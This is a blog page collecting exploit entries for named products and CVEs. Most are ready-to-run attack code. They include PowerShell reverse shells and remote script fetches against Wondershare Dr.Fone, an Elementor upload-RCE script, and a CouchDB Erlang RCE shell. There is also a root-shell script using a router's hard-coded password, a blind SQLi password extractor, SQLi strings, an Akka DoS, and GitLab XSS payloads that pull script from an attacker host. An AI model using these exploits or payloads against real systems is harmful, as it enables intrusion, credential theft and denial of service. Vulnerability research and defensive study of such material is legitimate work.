# Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44595
# References: https://github.com/netanelc305/WonderShell
#Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges.
#!/bin/python3
import msgpackrpc
LADDR = "192.168.14.129"
LPORT = 1338
RADDR = "192.168.14.137"
RPORT = 12345
param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345))
result = client.call('system_s','powershell',param)
# stty raw -echo; (stty size; cat) | nc -lvnp 1338
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863113550
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 04/16/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://elementor.com/
# Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version)
# Version: 3.6.0, 3.6.1, 3.62
# Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload)
#!/usr/bin/python
import requests
import re
# WARNING: This exploit does NOT include the payload.
# Also, be sure you already have some valid credentials. This exploit needs an account in order to work.
# # # # # VULNERABILITY DESCRIPTION # # # # #
# The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file.
# This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control)
# The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php
#
# At the end of this file you can find this code:
# add_action( 'admin_init', function() {
# if ( wp_doing_ajax() &&
# isset( $_POST['action'] ) &&
# isset( $_POST['_nonce'] ) &&
# wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY )
# ) {
# $this->maybe_handle_ajax();
# }
# } );
#
# This code is triggered whenever ANY user account visits /wp-admin
# In order to work we need the following 4 things:
# 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php
# 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file)
# 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function)
# 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file)
#
# The file we upload must have the following structure:
# 1. It must be a ZIP file. You can name it as you want.
# 2. It must contain a folder called "elementor-pro"
# 3. This folder must contain a file named "elementor-pro.php"# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
# 4. The payload must contain AT LEAST the plugin name, otherwise WordPress will NOT accept it and the upload will FAIL
# e.g.
# <?php
# /**
# * Plugin Name: Elementor Pro
# */
# // Actual PHP payload
# ?>
# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else)
#
# WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload.
# If it tries, for example, to connect to an offline host, it could lead to a Denial of Service.
# In order to prevent this, I suggest you to use some variable to activate the payload.
# Something like this (visit anypage.php?activate=1 in order to continue with the actual payload):
# if (!isset($_GET['activate']))
# return;
# Change the following 4 variables:
payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload
baseUrl = 'http://192.168.56.103/wordpress/' # Change this with the base url of the target
username = 'guest' # Change this with the username you want to use to log in
password = 'test' # Change this with the password you want to use to log in
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
session = requests.Session()
cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies
def DoLogin(username, password):
global cookies
loginUrl = baseUrl + 'wp-login.php'
adminUrl = baseUrl + 'wp-admin/'
data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 }
# search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"}
# 4e8878bdba is just an example of nonce. It can be anything else.
regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}')
response = session.post(loginUrl, cookies=cookies, data=data)
search = regexp.search(response.text)
if not search:
# I've tested this on WordPress v. 5.9.3
# Fix the regexp if needed.
print('Error - Invalid credentials?')
#print(response.text)
else:
return search.group(1)
def UploadFile(fileName, nonce):
uploadUrl = baseUrl + 'wp-admin/admin-ajax.php'
data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce }
files = { 'fileToUpload' : open(fileName, 'rb') }
regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true
response = session.post(uploadUrl, data=data, files=files)
search = regexp.search(response.text)
if not search:
# If Elemento Pro is already installed, the upload will fail.
# You can print the response to investigate further
print ('Error - Upload failed')
# print (response.text)
return False
else:
print ('Upload completed successfully!')
return True
# Define YOUR method to activate your payload (if needed)
def ActivatePayload():
payloadUrl = baseUrl + 'index.php?activate=1'
session.get(payloadUrl)
print('Trying to login...')
nonce = DoLogin(username, password)
print('Nonce found: ' + nonce)
print('Uploading payload...')
fileUploaded = UploadFile(payloadFileName, nonce)
# Define YOUR method to activate your payload (if needed)
if fileUploaded:
print ('Activating payload...')
ActivatePayload()
# Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.easeus.com/
# Tested Version: 15.1.0.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto
| findstr /i /v "C:\Windows\\" | findstr /i /v """
EaseUS UPDATE SERVICE
EaseUS UPDATE SERVICE C:\Program Files
(x86)\EaseUS\ENS\ensserver.exe Auto
C:\>sc qc "EaseUS UPDATE SERVICE"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: EaseUS UPDATE SERVICE
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : EaseUS UPDATE SERVICE
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-HR3T34O
OS Name: Microsoft Windows 10 Home
OS Version: 10.0.19042 N/A Build 19042
# Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)# Google Dork: NA
# Date: 11/03/2022
# Exploit Author: Ali J
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0
# Version: 1.5.0
# Tested on: Windows 10
Steps to Reproduce:
1. Login with user 1 and navigate to localhost/FUEL-CMS/fuel/sitevariables
2. Select any variable, click on delete button and select "yes, delete it". Intercept this request and generate a CSRF POC for this. After that drop the request.
3. Login with user 2 in a seperate browser and execute the CSRF POC.
4. Observe that the site variable has been deleted. To confirm, login with user 1 again and observe that the variable has been deleted from site variables.
# Exploit Title: Gitlab 14.9 - Authentication Bypass
# Date: 12/04/2022
# Exploit Authors: Greenwolf
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2
# Tested on: Linux
# CVE : CVE-2022-1162
# References: https://github.com/Greenwolf/CVE-2022-1162
A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts.
Exploit:
New Gitlab Accounts (created since the first affect version and if Gitlab is before the patched version) can be logged into with the following password:
123qweQWE!@#000000000
# Exploit Title: Gitlab Stored XSS
# Date: 12/04/2022
# Exploit Authors: Greenwolf
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install
# Version: GitLab CE/EE versions 14.4 before 14.7.7, all versions starting from 14.8 before 14.8.5, all versions starting from 14.9 before 14.9.2
# Tested on: Linux
# CVE : CVE-2022-1175
# References: https://github.com/Greenwolf/CVE-2022-1175
Any user can create a project with Stored XSS in an issue. XSS on Gitlab is very dangerous and it can create personal access tokens leading users who visit the XSS page to silently have the accounts backdoor.
Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though.
<pre data-sourcepos=""%22 href="x"></pre><base href=http://unsafe-website.com/><pre x=""><code></code></pre>
Standard script include also works depending on the sites CSP policy. This is more stealthy.
<pre data-sourcepos=""%22 href="x"></pre><script src="https://attacker-site.com/bad.js"></script><pre x=""><code></code></pre>
# Exploit Title: PTPublisher v2.3.4 - Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2022-18-04
# Vendor Homepage: https://www.primera.com/
# Tested Version: 2.3.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Pro x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
PTProtect
PTProtect
C:\Program Files (x86)\Primera
Technology\PTPublisher\UsbFlashDongleService.exe
Auto
C:\>sc qc PTProtect
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: PTProtect
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\PrimeraTechnology\PTPublisher\UsbFlashDongleService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : PTProtect
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-OUHAB1I
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044
# Exploit Title: ImpressCMS v1.4.4 - Unrestricted File Upload
# Date: 7/4/2022
# Exploit Author: Ünsal Furkan Harani (Zemarkhos)
# Vendor Homepage: https://www.impresscms.org/
# Software Link: https://github.com/ImpressCMS/impresscms
# Version: v1.4.4
# Description:
Between lines 152 and 162, we see the function "extensionsToBeSanitized".Since the blacklist method is weak, it is familiar that the file can be uploaded in the extensions mentioned below.
.php2, .php6, .php7, .phps, .pht, .pgif, .shtml, .htaccess, .phar, .inc
Impresscms/core/File/MediaUploader.php Between lines 152 and 162:
private $extensionsToBeSanitized = array('php','phtml','phtm','php3','php4','cgi','pl','asp','php5');
# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
# Date: 18/4/2022
# Exploit Author: cxosmo
# Vendor Homepage: https://akka.io
# Software Link: https://github.com/akka/akka-http
# Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
# Tested on: Akka HTTP 10.2.4, Ubuntu
# CVE : CVE-2021-42697
import argparse
import logging
import requests
# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()
def send_benign_request(url, verify=True):
log.info(f"Sending benign request to {url} for checking reachability...")
try:
r = requests.get(url)
log.info(f"Benign request returned following status code: {r.status_code}")
return True
except Exception as e:
log.info(f"The following exception was encountered: {e}")
return False
def send_malicious_request(url, verify=True):
log.info(f"Sending malicious request to {url}")
# Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
nested_comment_payload = "("*8191
headers = {'User-Agent': nested_comment_payload}
try:
r = requests.get(url, headers=headers)
log.info(f"Request returned following status code: {r.status_code}")
# Expected exception to be returned if server is DoSed successfully
except requests.exceptions.RequestException as e:
if "Remote end closed connection without response" in str(e):
log.info(f"The server is unresponsive per {e}: DoS likely successful")
except Exception as e:
log.info(f"The following exception was encountered: {e}")
if __name__ == "__main__":
# Parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument("-t", "--target",
help="Target URL for vulnerable Akka server (e.g. https://localhost)",
required="True", action="store")
parser.add_argument("-k", "--insecure",
help="Disable verification of SSL/TLS certificate",
action="store_false", default=True)
args = parser.parse_args()
# Send requests: first is connectivity check, second is DoS attempt
if send_benign_request(args.target, args.insecure):
send_malicious_request(args.target, args.insecure)
# Exploit Title: Microfinance Management System 1.0 - 'customer_number' SQLi
# Date: 2022-25-03
# Exploit Author: Eren Gozaydin
# Vendor Homepage: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
# Version: 1.0
# Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51
# CVE: CVE-2022-27927
# References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
------------------------------------------------------------------------------------
1. Description:
----------------------
Microfinance Management System allows SQL Injection via parameter 'customer_number' in
/mims/updatecustomer.php. Exploiting this issue could allow an attacker to compromise
the application, access or modify data, or exploit latent vulnerabilities
in the underlying database.
2. Proof of Concept:
----------------------
In Burpsuite intercept the request from the affected page with
'customer_number' parameter and save it like poc.txt Then run SQLmap to extract the
data from the database:
sqlmap.py -r poc.txt --dbms=mysql
3. Example payload:
----------------------
(error-based)
customer_number=-5361' OR 1 GROUP BY CONCAT(0x716a786271,(SELECT (CASE WHEN (6766=6766) THEN 1 ELSE 0 END)),0x7171716a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
4. Burpsuite request:
----------------------
GET /mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27 HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=rf50l831r3vn4ho0g6aef189bt
Referer: http://localhost/mims/managecustomer.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
# Exploit Title: WebTareas 2.4 - Blind SQLi (Authenticated)
# Date: 04/20/2022
# Exploit Author: Behrad Taher
# Vendor Homepage: https://sourceforge.net/projects/webtareas/
# Version: < 2.4p3
# CVE : CVE-2021-43481
#The script takes 3 arguments: IP, user ID, session ID
#Example usage: python3 webtareas_sqli.py 127.0.0.1 1 4au5376dddr2n2tnqedqara89i
import requests, time, sys
from bs4 import BeautifulSoup
ip = sys.argv[1]
id = sys.argv[2]
sid = sys.argv[3]
def sqli(column):
print("Extracting %s from user with ID: %s\n" % (column,id))
extract = ""
for i in range (1,33):
#This conditional statement will account for variable length usernames
if(len(extract) < i-1):
break
for j in range(32,127):
injection = "SELECT 1 and IF(ascii(substring((SELECT %s FROM gW8members WHERE id=1),%d,1))=%d,sleep(5),0);" % (column,i,j)
url = "http://%s/approvals/editapprovaltemplate.php?id=1" % ip
GET_cookies = {"webTareasSID": "%s" % sid}
r = requests.get(url, cookies=GET_cookies)
#Because the app has CSRF protection enabled we need to send a get request each time and parse out the CSRF Token"
token = BeautifulSoup(r.text,features="html.parser").find('input', {'name':'csrfToken'})['value']
#Because this is an authenticated vulnerability we need to provide a valid session token
POST_cookies = {"webTareasSID": "%s" % sid}
POST_data = {"csrfToken": "%s" % token, "action": "update", "cd": "Q", "uq": "%s" % injection}
start = time.time()
requests.post(url, cookies=POST_cookies, data=POST_data)
end = time.time() - start
if end > 5:
extract += chr(j)
print ("\033[A\033[A")
print(extract)
break
#Modularized the script for login and password values
sqli("login")
sqli("password")
# Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
# Exploit Author: LiquidWorm
#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
# 1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is a industrial 4G wireless LTE router which provides
# a solution for users to connect own device to 4G network via WiFi interface
# or Ethernet interface. USR-G806 adopts high performance embedded CPU which
# can support 580MHz working frequency and can be widely used in Smart Grid,
# Smart Home, public bus and Vending machine for data transmission at high
# speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
# flow control and has many advantages including high reliability, simple
# operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
# WLAN interface, 4G interface. USR-G806 provides various networking mode
# to help user establish own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These sets of credentials are never
# exposed to the end-user and cannot be changed through any normal operation
# of the device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device. The password is also the default WLAN password.
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
# # exit
#
# lqwrm@metalgear:~$
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
# OpenWrt/Linaro GCC 4.8-2014.04
# Ralink SoC MT7628 PCIe RC mode
# BusyBox v1.22.1
# uhttpd
# Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#
import paramiko as bah
import sys as baaaaaah
bnr='''
▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄
█▪██▌▐█ ▀. ▀▄ █·██ ▪ •██
█▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪
▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·
▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄
▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·
▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄
██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀
▀▄ █·▪ ▪ •██
▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪
▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·
▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·
▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.
▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄
▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█
▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀
'''
print(bnr)
if len(baaaaaah.argv)<2:
print('--Gief me an IP.')
exit(0)
adrs=baaaaaah.argv[1]
unme='usr'
pwrd='www.usr.cn'
rsh=bah.SSHClient()
rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
try:
rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
print('--Got rewt!')
except:
print('--Backdoor removed.')
exit(-1)
while True:
cmnd=input('# ')
if cmnd=='exit':
rsh.exec_command('exit')
break
stdin,stdout,stderr = rsh.exec_command(cmnd)
print(stdout.read().decode().strip())
rsh.close()
# Exploit Title: Bookeen Notea - Directory Traversal
# Date: December 2021
# Exploit Author: Clement MAILLIOUX
# Vendor Homepage: https://bookeen.com/
# Software Link: N/A
# Version: BK_R_1.0.5_20210608
# Tested on: Bookeen Notea (Android 8.1)
# CVE : CVE 2021-45783
# The affected version of the Bookeen Notea System Update is prone to directory traversal vulnerability related to its note Export function.
# The vulnerability can be triggered like so :
# - Create a note or use an existing note on the device
# - rename this note ../../../../../../
# - keep touching the note until a menu appears
# - touch to select "export"
# - touch "View"
# Now you can access and explore the device filesystem.
Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi
# Date: 2021-4-21
# Exploit Author: Aydin Naserifard
# Vendor Homepage: https://www.adobe.com/
# Software Link: https://github.com/magento/magento2/releases/tag/2.3.5-p2
# Version: [2.3.5-p2]
# Tested on: [2.3.5-p2]
POC:
1)PUT
/rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23
2)POST /cargo/index/validateqty
[quote_id parameter]
quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23
# Exploit Title: WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated)
# Google Dork: -
# Date: 2022-03-13
# Exploit Author: Roel van Beurden
# Vendor Homepage: -
# Software Link: https://downloads.wordpress.org/plugin/advanced-uploader.4.2.zip
# Version: <=4.2
# Tested on: WordPress 5.9 on Ubuntu 18.04
# CVE: CVE-2022-1103
1. Description:
----------------------
WordPress Plugin Advanced Uploader <=4.2 allows authenticated arbitrary file upload. Any file(type) can be uploaded. A malicious user can perform remote code execution on the backend webserver.
2. Proof of Concept:
----------------------
- Upload file/webshell/backdoor with the Advanced Uploader plugin;
- File is uploaded in the Wordpress Media Library;
- Go to /wp-content/uploads/ where the file is saved;
- Click on the uploaded file for whatever it's supposed to do (RCE, reverse shell).
3. Exploitation demo:
----------------------
https://www.youtube.com/watch?v=Bwpf-IpxtXQ
# Exploit Title: Wondershare Dr.Fone 12.0.7 - Remote Code Execution (RCE)
# Date: 4/27/2022
# Exploit Author: Netanel Cohen & Tomer Peled
# Vendor Homepage: https://drfone.wondershare.net/
# Software Link: https://download.wondershare.net/drfone_full4008.exe
# Version: up to 12.0.7
# Tested on: Windows 10
# CVE : 2021-44596
# References: https://github.com/netanelc305/WonderShell
Wondershare LTD Dr. Fone as of 2021-12-06 version is affected by Remote code execution. Due to software design flaws an unauthenticated user can communicate over UDP with the "InstallAssistService.exe" service(the service is running under SYSTEM privileges) and manipulate it to execute malicious executable without any validation from a remote location and gain SYSTEM privileges
#!/usr/bin/python3
# stty raw -echo; (stty size; cat) | nc -lvnp 1337
import socket
payload = """WindowsPowerShell\\v1.0\powershell.exe
-nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.14.129',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Admin
12345"""
byte_message = bytes(payload, "utf-8")
for i in range(1024,65500):
opened_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
opened_socket.sendto(byte_message, ("192.168.14.137", i))
print(f"Trying port {i}",end="\r")
# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
# Date: 2022-01-21
# Exploit Author: Konstantin Burov, @_sadshade
# Software Link: https://couchdb.apache.org/
# Version: 3.2.1 and below
# Tested on: Kali 2021.2
# Based on 1F98D's Erlang Cookie - Remote Code Execution
# Shodan: port:4369 "name couchdb at"
# CVE: CVE-2022-24706
# References:
# https://habr.com/ru/post/661195/
# https://www.exploit-db.com/exploits/49418
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
#
#
#!/usr/local/bin/python3
import socket
from hashlib import md5
import struct
import sys
import re
import time
TARGET = ""
EPMD_PORT = 4369 # Default Erlang distributed port
COOKIE = "monster" # Default Erlang cookie for CouchDB
ERLNAG_PORT = 0
EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
# Some data:
NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
def compile_cmd(CMD):
MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
MSG += struct.pack(">H", len(CMD))
MSG += bytes(CMD, 'ascii')
MSG += b'jw\x04user'
PAYLOAD = b'\x70' + CTRL_DATA + MSG
PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
return PAYLOAD
print("Remote Command Execution via Erlang Distribution Protocol.\n")
while not TARGET:
TARGET = input("Enter target host:\n> ")
# Connect to EPMD:
try:
epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
epm_socket.connect((TARGET, EPMD_PORT))
except socket.error as msg:
print("Couldnt connect to EPMD: %s\n terminating program" % msg)
sys.exit(1)
epm_socket.send(EPM_NAME_CMD) #request Erlang nodes
if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
data = epm_socket.recv(1024)
data = data[0:len(data) - 1].decode('ascii')
data = data.split("\n")
if len(data) == 1:
choise = 1
print("Found " + data[0])
else:
print("\nMore than one node found, choose which one to use:")
line_number = 0
for line in data:
line_number += 1
print(" %d) %s" %(line_number, line))
choise = int(input("\n> "))
ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0])
else:
print("Node list request error, exiting")
sys.exit(1)
epm_socket.close()
# Connect to Erlang port:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, ERLNAG_PORT))
except socket.error as msg:
print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
sys.exit(1)
s.send(NAME_MSG)
s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]
#print("Extracted challenge: {}".format(challenge))
# Add Challenge Digest
CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
+ bytes(str(challenge), "ascii")).digest()
s.send(CHALLENGE_REPLY)
CHALLENGE_RESPONSE = s.recv(1024)
if len(CHALLENGE_RESPONSE) == 0:
print("Authentication failed, exiting")
sys.exit(1)
print("Authentication successful")
print("Enter command:\n")
data_size = 0
while True:
if data_size <= 0:
CMD = input("> ")
if not CMD:
continue
elif CMD == "exit":
sys.exit(0)
s.send(compile_cmd(CMD))
